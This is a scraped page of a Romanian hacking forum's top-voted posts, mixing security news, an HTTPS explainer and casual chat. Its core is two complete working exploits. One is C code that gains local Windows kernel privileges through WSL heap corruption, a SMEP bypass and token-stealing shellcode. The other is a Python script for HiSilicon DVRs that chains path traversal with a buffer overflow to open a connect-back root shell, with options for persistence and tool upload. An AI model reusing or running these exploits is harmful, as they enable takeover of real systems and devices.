  3. #define _GNU_SOURCE #include <errno.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <fcntl.h> #include <sys/socket.h> #include <sys/stat.h> #include <sys/wait.h> #include <sys/types.h> #include <sys/mman.h> #include <unistd.h> #include <sys/ipc.h> #include <sys/sem.h> #include <sys/shm.h> #define RING_SIZE 0x2000000 #define PIPE_SIZE 0xb8 #define PTR_SIZE 0x8 #define STR_HDR_SIZE 0x18 #define LEAK_OFFSET 0x68 #define SHELLCODE_OFFSET 0x200 #define CHUNK_LVXF_OFFSET 0x138f4296 #define CR4_VAL_ADDR 0x506f8 #define MAGIC_KEY 0xefef #define NT_OFFSET_TO_PIVOT 0x288005 size_t curr_key = 0; char SHELLCODE[] = { //0xcc, 0x90, // CLI 0x90, // PUSHFQ 0x48, 0xb8, 0x90, 0x90, 0x90 ,0x90 ,0x90, 0x90, 0x90, 0x90, // MOV RAX, Original Pointer 0x50, // PUSH RAX 0x51, // PUSH RCX 0x90, 0x90, 0x90, 0x90, 0x90 ,0x90 ,0x90, 0x90, 0x90, 0x90, // MOV RCX, [OverwriteAddr+OverwriteOffset] 0x90, 0x90, 0x90, // MOV QWORD PTR [RCX], RAX 0xb9, 0xfc, 0x11, 0x00, 0x00, // MOV ECX, PID 0x53, // PUSH RBX 0x65, 0x48, 0x8B, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00, // MOV RAX,QWORD PTR gs:0x188 0x48, 0x8B, 0x80, 0xB8, 0x00, 0x00, 0x00, // MOV RAX,QWORD PTR [RAX+0xb8] EPROCESS 0x48, 0x8d, 0x80, 0xe8, 0x02, 0x00, 0x00, // LEA RAX,[RAX+0xActiveProcessLinkOffset] //<tag> 0x48, 0x8b, 0x00, // MOV RAX,QWORD PTR [RAX] 0x48, 0x8b, 0x58, 0xf8, // MOV RBX,QWORD PTR [RAX-8] // UniqueProcessID 0x48, 0x83, 0xfb, 0x04, // CMP RBX,0x4 0x75, 0xf3, // JNE <tag> 0x48, 0x8b, 0x58, 0x70, // MOV RBX, QWORD PTR [RAX+0x70] // GET TOKEN of SYSTEM 0x90, 0x90, 0x90, 0x53, // PUSH RBX //<tag2> 0x48, 0x8b, 0x00, // MOV RAX,QWORD PTR [RAX] 0x48, 0x8b, 0x58, 0xf8, // MOV RBX,QWORD PTR [RAX-8] // UniqueProcessID 0x39, 0xcb, // CMP EBX, ECX // our PID 0x75, 0xf5, // JNE <tag2> 0x5b, // POP RBX 0x48, 0x89, 0x58, 0x70, // MOV QWORD PTR[RAX +0x70], RBX 0x90, 0x90, 0x90, 0x5b, // POP RBX 0x59, // POP RCX 0x58, // POP RAX 0x90, // POPFQ 0xc3 // RET }; int calc_stop_idx(size_t alloc_size, size_t factor); int get_size_factor(size_t spray_size, size_t *factor); int trigger_corruption(int spray_size); int call_LxpUtilReadUserStringSet(size_t argc, size_t innerSize, char pattern, size_t stopIdx); int spray(size_t count); int alloc_sem(size_t factor); int free_sem(int key); char *get_faked_shm(); void initialize_fake_obj(char *obj, char *shellcode_ptr, char *read_addr, size_t fake_shmid, size_t pid); void trigger_shm(size_t shmid); void print_shm(struct shmid_ds *buf); void *absolute_read(void* obj, size_t shmid, void *addr); int alloc_shm(size_t key); int shape(size_t *spray_size); int calc_stop_idx(size_t alloc_size, size_t factor) { size_t totalStringsLength, headersLength; totalStringsLength = (factor - 1) * 2 + 0xd001; headersLength = (factor * STR_HDR_SIZE) % (0x100000000); return (alloc_size + 496 + 0xc000) / STR_HDR_SIZE; } int get_size_factor(size_t spray_size, size_t *factor) { if (spray_size != 0x2000000) { printf("SPRAY_SIZE ISSUE\n"); exit(1); } *factor = 0xab13aff - 0x800*2; return 0x15fffdfc; } int trigger_corruption(int spray_size) { size_t factor = 0, alloc_size, stopIdx; int ret; alloc_size = get_size_factor(spray_size, &factor); if (alloc_size < 0) { printf("[*err*] unsupported spray_size == 0x%x", spray_size); return -1; } stopIdx = calc_stop_idx(alloc_size, factor); ret = call_LxpUtilReadUserStringSet(factor + 1, 1, 'O', stopIdx); printf("[*] trigger_corruption() returned 0x%x\n", ret); return 0; } int call_LxpUtilReadUserStringSet(size_t argc, size_t innerSize, char pattern, size_t stopIdx) { char **argv, *innerBuf, *stopInnerBuf = NULL; size_t pid; argv = (char*)mmap(NULL, argc * sizeof(char*), PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, -1, 0); if(!argv) { perror("[*err*] malloc argv failed\n"); return -1; } innerBuf = (char*)malloc(innerSize); if (!innerBuf) { printf("[*err*] malloc innerBuf failed\n"); return -1; } memset(innerBuf, pattern, innerSize); for(size_t i = 0; i < argc - 1; ++i) { argv[i] = innerBuf; } argv[argc-1] = NULL; pid = fork(); if (pid) { // parent if(stopIdx > 0) { sleep(1.5); printf("[*] set stopIdx, stopping wildcopy\n"); argv[stopIdx] = NULL; } return 0; } else { // son argv[stopIdx - 1] = (char*)malloc(0xe000); memset(argv[stopIdx - 1], "X", 0xd000-1); argv[stopIdx - 1][0xd000-1] = '\0'; argv[stopIdx - 7] = (char*)malloc(0xe000); memset(argv[stopIdx - 7], "X", 0xd000-1); argv[stopIdx - 7][0xd000-1] = '\0'; // this execve is on nonsense "program", so it will return err. // Just kill the thread. execve(argv[0], argv, NULL); exit(1); } } /* spray <count> chunks, and return number of total bytes allocated */ int spray(size_t count) { int exec[2]; int pipe_capacity = 0, ret = 0; for (size_t i = 0; i < count; ++i) { if (pipe(exec) < 0) { printf("[*err*] pipe\n"); ret = -1; goto cleanup; } pipe_capacity = fcntl(exec[1], F_SETPIPE_SZ, RING_SIZE); if(pipe_capacity < 0) { printf("[*err*] fcntl return neg capacity\n"); ret = -1; goto cleanup; } ret += pipe_capacity; } cleanup: return ret; } /* allocate 12 * v_nsems + 176 */ int alloc_sem(size_t factor) { int semid; int nsems = factor; semid = semget(curr_key++, nsems, IPC_CREAT | 0666); if(semid == -1) { printf("[*err*]semget failed, errno == 0x%x\n", errno); return -1; } return semid; } int free_sem(int key) { if(semctl(key, 0, IPC_RMID, 0) == -1) { printf("[*err*] semctl failed, errno == 0x%x\n", errno); return -1; } return 0; } char *get_faked_shm() { size_t shellcode_length = 0; char *obj = (char*)mmap(0xc000, 0x10000, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_SHARED | MAP_ANONYMOUS, -1, 0x0); char *shellcode_ptr; if (obj == (void*)-1) { printf("[*err*] mmap failed\n"); return NULL; } char *cr4_addr = (char*)mmap(CR4_VAL_ADDR & ~0xfff, 0x10000, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_SHARED | MAP_ANONYMOUS, -1, 0x0); if (cr4_addr == (void*)-1) { printf("[*err*] mmap failed\n"); return NULL; } memset(cr4_addr, 0x0, 0x10000); printf("[*] mmap userspace addr %p, set faked shm object\n", obj); obj += 0x1000; shellcode_ptr = obj + 0x200; initialize_fake_obj(obj, shellcode_ptr, NULL, 0x41414141, -1); return obj; } void initialize_fake_obj(char *obj, char *shellcode_ptr, char *read_addr, size_t fake_shmid, size_t pid) { size_t val = 0x4141414141414141, val2 = 7, val3 = CR4_VAL_ADDR; char *obj2 = obj+0x1000; memset(obj - 0x100, 0x0, 0x1000); memcpy(obj, &read_addr, sizeof(size_t)); memcpy((obj+0x10), &val, sizeof(size_t)); memcpy(obj - 0x20, &val2, sizeof(size_t)); memcpy(obj - 0x68, &obj, sizeof(char*)); memcpy(obj + 0x28, &shellcode_ptr, sizeof(char*)); memcpy(obj - 0x80, &obj, sizeof(char*)); memcpy((obj + 0x40), &val, sizeof(size_t)); memcpy(CR4_VAL_ADDR + 0x10, &fake_shmid, sizeof(size_t)); memcpy(CR4_VAL_ADDR - 0x20, &val2, sizeof(size_t)); memcpy(CR4_VAL_ADDR - 0x80, &val3, sizeof(char*)); memcpy(CR4_VAL_ADDR - 0x68, &val3, sizeof(char*)); memcpy(CR4_VAL_ADDR + 0x28, &shellcode_ptr, sizeof(char*)); memcpy((CR4_VAL_ADDR + 0x40), &val, sizeof(size_t)); memcpy(CR4_VAL_ADDR + 0x18, &val2, sizeof(size_t)); // refcount memcpy((CR4_VAL_ADDR + 0x50), &obj2, sizeof(size_t)); memcpy((CR4_VAL_ADDR + 0x90), &val3, sizeof(size_t)); memcpy(obj + SHELLCODE_OFFSET, SHELLCODE, sizeof(SHELLCODE)); memcpy(obj + SHELLCODE_OFFSET + 28, &pid, 4); } void trigger_shm(size_t shmid) { char *data; data = shmat(shmid, (void*)0, 0); } void print_shm(struct shmid_ds *buf) { printf ("\nThe USER ID = %p\n", buf->shm_perm.uid); printf ("The GROUP ID = %p\n", buf->shm_perm.gid); printf ("The creator's ID = %p\n", buf->shm_perm.cuid); printf ("The creator's group ID = %p\n", buf->shm_perm.cgid); printf ("The operation permissions = 0%o\n", buf->shm_perm.mode); printf ("The slot usage sequence\n"); //printf ("number = 0%x\n", buf->shm_perm.seq); //printf ("The key= 0%x\n", buf->shm_perm.key); printf ("The segment size = %p\n", buf->shm_segsz); printf ("The pid of last shmop = %p\n", buf->shm_lpid); printf ("The pid of creator = %p\n", buf->shm_cpid); printf ("The current # attached = %p\n", buf->shm_nattch); printf("The last shmat time = %p\n", buf->shm_atime); printf("The last shmdt time = %p\n", buf->shm_dtime); printf("The last change time = %p\n", buf->shm_ctime); } void *absolute_read(void* obj, size_t shmid, void *addr) { struct shmid_ds shm; initialize_fake_obj(obj, obj + SHELLCODE_OFFSET, addr, shmid, -1); shmctl(shmid, IPC_STAT, &shm); return (void*)shm.shm_ctime; } int alloc_shm(size_t key) { int shmid; shmid = shmget(key, 1024, 0644 | IPC_CREAT); return shmid; } int shape(size_t *spray_size) { size_t keys[0x400]; int exec[2]; int sv[2]; char flag; size_t bytes = 0, tofree = 0; size_t factor,hole_size; struct flock fl; memset(&fl, 0, sizeof(fl)); pid_t pid, wpid; int status; if (socketpair(AF_UNIX, SOCK_STREAM, 0, sv) == -1) { printf("[*err] socketpair failed\n"); return 1; } bytes = spray(1); if (bytes == (size_t)-1) { printf("[*err*] bytes < 0, are you root?\n"); return 1; } *spray_size = bytes; hole_size = get_size_factor(*spray_size, &factor); tofree = hole_size / (bytes / 1) + 1; printf("[*] allocate holes before the workspace\n"); for (int i = 0; i < 0x400; ++i) { keys[i] = alloc_sem(0x7000); } for (int i = 0; i < 0x20; ++i) { alloc_sem(0x7000); } for (int i = 0; i < 0x2000; ++i) { alloc_sem(4063); } for (int i = 0; i < 0x2000; ++i) { alloc_sem(3); } pid = fork(); if (pid > 0) { printf("[*] alloc 0xc pages groups, adjust to continuous allocations\n"); bytes = spray(5); write(sv[1], "p", 1); read(sv[1], &flag, 1); } else { // son read(sv[0], &flag, 1); printf("[*] alloc workspace pages\n"); bytes = spray(tofree); printf("[*] finish allocate workspace allocations\n"); write(sv[0], "p", 1); } if (pid > 0) { printf("[*] allocating (0xc - shm | shm) AFTER the workspace\n"); for (int i = 0; i < 0x100; ++i) { alloc_sem(4061); for (int j = 0; j < 0x5; ++j) { alloc_shm(i * 0x100 + j); } } write(sv[1], "p", 1); } else { read(sv[0], &flag, 1); printf("[*] free middle allocation, creating workspace freed\n"); exit(1); } while ((wpid = wait(&status)) > 0); printf("[*] free prepared holes, create little pages holes before the workspace\n"); for (int i = 0; i < 0x400; ++i) { free_sem(keys[i]); } return 0; } int main(int argc, char **argv) { size_t spray_size = 0; char *obj; void *paged_pool_addr, *file_obj, *lxcore_addr, *nt_c_specific_handler; void *nt_addr; obj = get_faked_shm(); printf("[*] start shaping\n"); if (shape(&spray_size)) { printf("[*err*] shape failed, exit\n"); return 1; } // if there is some shm with shmid==0, delete it shmctl(0, IPC_RMID, NULL); printf("[*] shape is done\n"); if (trigger_corruption(spray_size) < 0) { printf("[*err*] internal error\n"); return 1; } sleep(8); printf("[*] leak shm, with the corrupted shmid\n"); paged_pool_addr = absolute_read(obj, 1, NULL); printf("[*] infoleak - PagedPool addr at %p\n", paged_pool_addr); file_obj = absolute_read(obj, 0xffff, paged_pool_addr + CHUNK_LVXF_OFFSET - LEAK_OFFSET); printf("[*] infoleak - fileObj addr at %p\n", file_obj); lxcore_addr = absolute_read(obj, 0, file_obj - 0x68 - LEAK_OFFSET); printf("[*] infoleak - lxcore!LxpSharedSectionFileType addr at %p\n", lxcore_addr); nt_c_specific_handler = absolute_read(obj, 0, lxcore_addr + 0x8b90 - LEAK_OFFSET); printf("[*] infoleak - nt!_C_specific_handler addr at %p\n", nt_c_specific_handler); printf("[*] call nt pivot, disable SMEP\n"); initialize_fake_obj(obj, nt_c_specific_handler + NT_OFFSET_TO_PIVOT, CR4_VAL_ADDR, MAGIC_KEY, -1); trigger_shm(MAGIC_KEY); sleep(5); printf("[*] jump to shellcode!\n"); initialize_fake_obj(obj, obj+0x200, CR4_VAL_ADDR, MAGIC_KEY, atoi(argv[1])); trigger_shm(MAGIC_KEY); sleep(2); return 0; }
    2 points
  4. Incearca aici, poate ii prinzi pe astia
    1 point
  5. Sa nu fii suparat bre :), eu nu-s suparat deloc pe tine, dar stau dupa tine de o luna si 2 saptamani sa faci scriptul. Chiar ma bucuram ca m-a contactat user cu reputatie. Te-am si platit inainte, si ti-am dat si mai mult decat ai cerut doar sa il faci. Din pula promptitutdine, din pula functionalitate. Mereu cand vorbim zici ca il faci. Ai zis ca sambata (ieri) il faci si nici urma de tine pe Skype. Daca esti asa ocupat nu ar fi trebuit sa iei proiectul de la bun inceput. Deci il faci azi? Daca da, fa-l te rog. Daca nu, zi-mi sa iti dau paypal/wallet/iban sa imi dai banii inapoi si o sa lucrez cu altcineva.
    1 point
  6. 2017 was the year of high profile data breaches and ransomware attacks, but from the beginning of this year, we are noticing a faster-paced shift in the cyber threat landscape, as cryptocurrency-related malware is becoming a popular and profitable choice of cyber criminals. Several cybersecurity firms are reporting of new cryptocurrency mining viruses that are being spread using EternalBlue—the same NSA exploit that was leaked by the hacking group Shadow Brokers and responsible for the devastating widespread ransomware threat WannaCry. Researchers from Proofpoint discovered a massive global botnet dubbed "Smominru," a.k.a Ismo, that is using EternalBlue SMB exploit (CVE-2017-0144) to infect Windows computers to secretly mine Monero cryptocurrency, worth millions of dollars, for its master. Active since at least May 2017, Smominru botnet has already infected more than 526,000 Windows computers, most of which are believed to be servers running unpatched versions of Windows, according to the researchers. "Based on the hash power associated with the Monero payment address for this operation, it appeared that this botnet was likely twice the size of Adylkuzz," the researchers said. The botnet operators have already mined approximately 8,900 Monero, valued at up to $3.6 million, at the rate of roughly 24 Monero per day ($8,500) by stealing computing resources of millions of systems. The highest number of Smominru infection has been observed in Russia, India, and Taiwan, the researchers said. https://thehackernews.com/2018/01/cryptocurrency-mining-malware.html
    1 point
  7. Cryptography can be a hard subject to understand. It’s full of mathematical proofs. But unless you are actually developing cryptographic systems, much of that complexity is not necessary to understand what is going on at a high level. If you opened this article hoping to create the next HTTPS protocol, I’m sorry to say that pigeons won’t be enough. Otherwise, brew some coffee and enjoy the article. Alice, Bob and … pigeons? Any activity you do on the Internet (reading this article, buying stuff on Amazon, uploading cat pictures) comes down to sending and receiving messages to and from a server. This can be a bit abstract so let’s imagine that those messages were delivered by carrier pigeons. I know that this may seem very arbitrary, but trust me HTTPS works the same way, albeit a lot faster. Also instead of talking about servers, clients and hackers, we will talk about Alice, Bob and Mallory. If this isn’t your first time trying to understand cryptographic concepts you will recognize those names, because they are widely used in technical literature. A first naive communication If Alice wants to send a message to Bob, she attaches the message on the carrier pigeon’s leg and sends it to Bob. Bob receives the message, reads it and it’s all is good. But what if Mallory intercepted Alice’s pigeon in flight and changed the message? Bob would have no way of knowing that the message that was sent by Alice was modified in transit. This is how HTTP works. Pretty scary right? I wouldn’t send my bank credentials over HTTP and neither should you. A secret code Now what if Alice and Bob are very crafty. They agree that they will write their messages using a secret code. They will shift each letter by 3 positions in the alphabet. For example D → A, E → B, F → C. The plain text message “secret message” would be “pbzobq jbppxdb”. Now if Mallory intercepts the pigeon she won’t be able to change the message into something meaningful nor understand what it says, because she doesn’t know the code. But Bob can simply apply the code in reverse and decrypt the message where A → D, B → E, C → F. The cipher text “pbzobq jbppxdb” would be decrypted back to “secret message”. Success! This is called symmetric key cryptography, because if you know how to encrypt a message you also know how to decrypt it. The code I described above is commonly known as the Caesar cipher. In real life, we use fancier and more complex codes, but the main idea is the same. How do we decide the key? Symmetric key cryptography is very secure if no one apart from the sender and receiver know what key was used. In the Caesar cipher, the key is an offset of how many letters we shift each letter by. In our example we used an offset of 3, but could have also used 4 or 12. The issue is that if Alice and Bob don’t meet before starting to send messages with the pigeon, they would have no way to establish a key securely. If they send the key in the message itself, Mallory would intercept the message and discover the key. This would allow Mallory to then read or change the message as she wishes before and after Alice and Bob start to encrypt their messages. This is the typical example of a Man in the Middle Attack and the only way to avoid it is to change the encryption system all together. Pigeons carrying boxes So Alice and Bob come up with an even better system. When Bob wants to send Alice a message she will follow the procedure below: Bob sends a pigeon to Alice without any message. Alice sends the pigeon back carrying a box with an open lock, but keeping the key. Bob puts the message in the box, closes the locks and sends the box to Alice. Alice receives the box, opens it with the key and reads the message. This way Mallory can’t change the message by intercepting the pigeon, because she doesn’t have the key. The same process is followed when Alice wants to send Bob a message. Alice and Bob just used what is commonly known as asymmetric key cryptography. It’s called asymmetric, because even if you can encrypt a message (lock the box) you can’t decrypt it (open a closed box). In technical speech the box is known as the public key and the key to open it is known as the private key. How do I trust the box? If you paid attention you may have noticed that we still have a problem. When Bob receives that open box how can he be sure that it came from Alice and that Mallory didn’t intercept the pigeon and changed the box with one she has the key to? Alice decides that she will sign the box, this way when Bob receives the box he checks the signature and knows that it was Alice who sent the box. Some of you may be thinking, how would Bob identify Alice’s signature in the first place? Good question. Alice and Bob had this problem too, so they decided that, instead of Alice signing the box, Ted will sign the box. Who is Ted? Ted is a very famous, well known and trustworthy guy. Ted gave his signature to everyone and everybody trusts that he will only sign boxes for legitimate people. Ted will only sign an Alice box if he’s sure that the one asking for the signature is Alice. So Mallory cannot get an Alice box signed by Ted on behalf of her as Bob will know that the box is a fraud because Ted only signs boxes for people after verifying their identity. Ted in technical terms is commonly referred to as a Certification Authority and the browser you are reading this article with comes packaged with the signatures of various Certification Authorities. So when you connect to a website for the first time you trust its box because you trust Ted and Ted tells you that the box is legitimate. Boxes are heavy Alice and Bob now have a reliable system to communicate, but they realize that pigeons carrying boxes are slower than the ones carrying only the message. They decide that they will use the box method (asymmetric cryptography) only to choose a key to encrypt the message using symmetric cryptography with (remember the Caesar cipher?). This way they get the best of both worlds. The reliability of asymmetric cryptography and the efficiency of symmetric cryptography. In the real world there aren’t slow pigeons, but nonetheless encrypting messages using asymmetric cryptography is slower than using symmetric cryptography, so we only use it to exchange the encryption keys. Now you know how HTTPS works and your coffee should also be ready. Go drink it you deserved it 😉 Sursa: https://medium.freecodecamp.org/https-explained-with-carrier-pigeons-7029d2193351
    1 point
  8. S8, A5 (7) si Huawei P8. Toate stock. Daca ai telefon slab si folosesti alt UI iti consuma RAM pe langa cel prestabilit din telefon. Touchwiz a evoluat foarte mult si e destul de frumos, se misca rapid.
    1 point
  9. #!/usr/bin/env python2 # # pwn hisilicon dvr web service # from pwn import * from time import sleep import re import argparse import os parser = argparse.ArgumentParser(description='exploit HiSilicon DVR devices') parser.add_argument('--rhost', help='target host', required=True) parser.add_argument('--rport', help='target port', default=80) parser.add_argument('--lhost', help='connectback ip', required=True) parser.add_argument('--lport', help='connectback port', default=31337) parser.add_argument('--bhost', help='listen ip to bind (default: connectback)') parser.add_argument('--bport', help='listen port to bind (default: connectback)') parser.add_argument('-n', '--nolisten', help='do not start listener (you should care about connectback listener on your own)', action='store_true') parser.add_argument('-i', '--interactive', help='select stack memory region interactively (rather than using autodetection)', action='store_true') parser.add_argument('-p', '--persistent', help='make connectback shell persistent by restarting dvr app automatically (DANGEROUS!)', action='store_true') parser.add_argument('-u', '--upload', help='upload tools (now hardcoded "./tools/dropbear" in script) after pwn', action='store_true') parser.add_argument('--offset', help='exploit param stack offset to mem page base (default: 0x7fd3d8)', default=0x7fd3d8) parser.add_argument('--cmdline', help='cmdline of Sofia binary on remote target (default "/var/Sofia")', default='/var/Sofia') args = parser.parse_args() target_host = args.rhost target_port = int(args.rport) sofia_cmdline = args.cmdline if args.interactive: getleak_interactive = True else: getleak_interactive = False if args.persistent: shell_persistent = True else: shell_persistent = False if args.upload: shell_upload = True else: shell_upload = False connectback_host = args.lhost connectback_port = int(args.lport) if args.bhost: listen_host = args.bhost else: listen_host = connectback_host if args.bport: listen_port = int(args.bport) else: listen_port = connectback_port """ vuln1: bof in httpd ------------------- buffer overflow in builtin webserver binary `Sofia` which can be exploited to run shellcode (as root) on the device. PoC payload to cause a segfault: payload = "GET " + "a"*299 + "xxxx" + " HTTP" note, that in "xxxx" we can control pc register (program flow)! there is no nx enabled, so executing shellcode in place of "a"*299 is possible. however, stack address leak is needed to defeat aslr. vuln2: path traversal vuln in httpd ----------------------------------- builtin webserver has a directory path traversal vulnerability which can be exploited to leak arbitrary files. note, that the webserver binary `Sofia` is running as root, so exploiting this arbitrary file can be read from device fs. PoC request "GET ../../etc/passwd HTTP" reads file "/etc/passwd". Furthermore, dir listing is enabled as well. by exploiting vuln2 we can defeat aslr needed to exploit vuln1. namely, filesystem at /proc contains lots of information about running processes, e.g. contains memory mappings: request "GET ../../proc/[pid]/maps HTTP" reads memory mapping of process with pid [pid]. obverving the memory mapping patterns usually enough to defeat aslr (offset from mem map base is the same, even in different versions). """ # get pid of running dvr binary '/var/Sofia' def findpid(): with log.progress('getting pidlist') as logp: c = context.log_level context.log_level = 'error' r = remote(target_host, target_port) r.sendline('GET ../../proc HTTP') pids = [] for line in r.recvall().splitlines(): res = re.match(r'.*\.\./\.\./proc/([0-9]+)"', line) if res: pids.append(int(res.group(1))) r.close() context.log_level = c logp.success('found %d processes' % len(pids)) with log.progress("searching for PID of '%s'" % sofia_cmdline) as logp: pid_sofia = None pids.sort(reverse=True) for pid in pids: logp.status(str(pid)) c = context.log_level context.log_level = 'error' r = remote(target_host, target_port) r.sendline('GET ../../proc/%d/cmdline HTTP' % pid) resp = r.recvall().splitlines() r.close() context.log_level = c if sofia_cmdline + '\x00' == resp[-1]: pid_sofia = pid logp.success(str(pid_sofia)) break if not pid_sofia: logp.failure('did not found') return pid_sofia def getmodelnumber(): c = context.log_level context.log_level = 'error' r = remote(target_host, target_port) r.sendline('GET ../../mnt/custom/ProductDefinition HTTP') for l in r.recvall(timeout=5).decode('ascii').replace(',', '\n').splitlines(): if "Hardware" in l: modelnumber = l.split(":")[1].split('"')[1] r.close() context.log_level = c return modelnumber def guessregion(smaps): for t in range(len(smaps)-7, 1, -1): if (smaps[t][1][0], smaps[t+1][1][0], smaps[t+2][1][0], smaps[t+3][1][0], smaps[t+4][1][0], smaps[t+5][1][0], smaps[t+6][1][0]) == (8188, 8188, 8188, 8188, 8188, 8188, 8188) and smaps[t][1][1] == 4 and smaps[t+1][1][1] == 4 and smaps[t+2][1][1] == 4 and smaps[t+3][1][1] >= 8 and smaps[t+4][1][1] >= 4 and smaps[t+5][1][1] >= 4 and smaps[t+6][1][1] >= 8: return (t+3) return (-1) # getting stack section base address # 'k' defines the section which contains the stack def getleak(pid, interactive): with log.progress("getting stack section base") as logp: c = context.log_level context.log_level = 'error' r = remote(target_host, target_port) r.sendline('GET ../../proc/%d/smaps HTTP' % pid) smaps = [] memStart = False for line in r.recvall().splitlines(): if memStart: t += (int(line.split()[1]),) i += 1 #if i >= 14: if i >= 7: smaps.append((memStart, t)) memStart = False if 'rwxp' in line: memStart = int(line.split('-')[0], 16) i = 0 t = () guess = guessregion(smaps) if guess < 0 or interactive: j = 0 for i in smaps: print (j, hex(i[0]), i[1:]) j += 1 k = int(raw_input('enter stack region id (guessed value = %d): ' % guess)) else: k = guess leak = smaps[k][0] r.close() context.log_level = c logp.success(hex(leak)) return leak # connectback shellcode # badchars: 0x00, 0x0d, 0x20, 0x3f, 0x26 def shellcode(lhost, lport): badchars = [0x00, 0x0d, 0x20, 0x3f, 0x26] badchars = map(chr, badchars) xscode = "01108fe211ff" xscode += "2fe111a18a78013a8a700221081c0121921a0f02193701df061c0ba10223" xscode += "0b801022023701df3e270137c821301c01df0139fbd507a0921ac27105b4" xscode += "69460b2701df0121081c01dfc046ffff7a69c0a858642f62696e2f736858" xscode += "ffffc046efbeadde" h = lambda x: hex(int(x))[2:] h2 = lambda x: h(x).zfill(2) xscode = xscode[:164] + h(lport+0x100).zfill(4) + ''.join(map(h2, lhost.split('.'))) + xscode[176:] xscode = xscode.decode('hex') for badchar in badchars: if badchar in xscode: raise NameError('badchar %s in shellcode!' % hex(ord(badchar))) return xscode def restart_dvrapp(c): with log.progress('restarting dvr application') as logp: logp.status('looking up dvrhelper process') c.sendline('ps') cmdline = '' while not 'dvrHelper' in cmdline: cmdline = c.recvline() cmdline = cmdline.split() while not 'ps' in c.recvline(): pass sleep(1) logp.status('killing dvrhelper') c.sendline('kill %s' % cmdline[0]) sleep(1) cmdline_dvrhelper = ' '.join(cmdline[4:]) logp.status('starting dvrhelper: %s' % cmdline_dvrhelper) c.sendline(cmdline_dvrhelper + ' 2>/dev/null &') sleep(1) c.recvuntil(sofia_cmdline) c.recvline() def upload_tools(c): with log.progress('uploading tools to /var/.tools') as logp: logp.status('creating dir') c.sendline('rm -fr /var/.tools') sleep(1) c.sendline('mkdir /var/.tools') sleep(1) tools = ['dropbear'] upload_blocksize = 1024 for tool in tools: toolsize = os.path.getsize('./tools/%s' % tool) b = 0 fp = open("./tools/%s" % tool, "rb") for chunk in iter(lambda: fp.read(upload_blocksize), ''): chunkhex = ''.join(['\\x'+chunk.encode('hex')[i:i+2].zfill(2) for i in range(0, len(chunk)*2, 2)]) c.sendline("echo -n -e '%s' >> /var/.tools/%s" % (chunkhex, tool)) b += len(chunk) logp.status('%s: %d/%d' % (tool, b, toolsize)) sleep(0.1) fp.close() c.sendline('chmod +x /var/.tools/%s' % tool) sleep(1) logp.success(' '.join(tools)) log.info('target is %s:%d' % (target_host, target_port)) if not args.nolisten: log.info('connectback on %s:%d' % (listen_host, listen_port)) with log.progress("assembling shellcode") as logp: xscode = shellcode(connectback_host, connectback_port) logp.success("done. length is %d bytes" % len(xscode)) with log.progress("identifying model number") as logp: modelnumber = getmodelnumber() logp.success(modelnumber) log.info('exploiting dir path traversal of web service to get leak addresses') stack_section_base = getleak(findpid(), getleak_interactive) stack_offset = args.offset stack_20 = stack_section_base + stack_offset + 20 log.info('shellcode address is ' + hex(stack_20)) payload = "GET " payload += xscode payload += "a" * (299 - len(xscode)) payload += p32(stack_20) payload += " HTTP" log.info('exploiting buffer overflow in web service url path') log.info('remote shell should gained by connectback shellcode!') if not args.nolisten: l = listen(bindaddr=listen_host, port=listen_port, timeout=5) c = l.wait_for_connection() r = remote(target_host, target_port) r.sendline(payload) r.recvall(timeout=5) r.close() if not args.nolisten: if shell_persistent: restart_dvrapp(c) if shell_upload: upload_tools(c) c.interactive() # 0day.today [2018-02-08] # Source: 0day.today
    1 point
  10. Fire din cupru? Astea sunt scumpe, plm.
    1 point
  11. Sigur? Nu stiu partea teoretica dar iti dau un exemplu concret. Cabluri de incarcat bateria auto, daca sunt prea subtiri se incalzesc ca dracu' si nici nu pornesti masina doar dupa ce stai vreo 10 minute. Daca ai cabluri home made groase in prima secunda cum le-ai conectat la alta masina iti si porneste. Ii ceva cu grosimea, rezistenta si alte cacaturi. Cautati voi pe net ca mie mi se rupe de cablu vostru
    1 point
  12. Salut ptoiectul a fost dat, multumesc celor interesati am salvat Id-urile, iar pt urmatoarele proiecte va voi contacta cu incredere,o zi buna .
    -1 points
  13. Prin gat in cur: https://capitalresearch.org/person/jacob-grandstaff/content/
    -1 points
  14. salutare tuturor as avea o rugaminte daca crede cineva ca ma poate ajuta cu un root de scan ma chinui cu vps free dar se restarteaza la ceva minute si nu reusesc sa prind unul ... multumesc
    -1 points
  15. asta e romanul sa comenteze aiurea ...
    -1 points
×
×
  • Create New...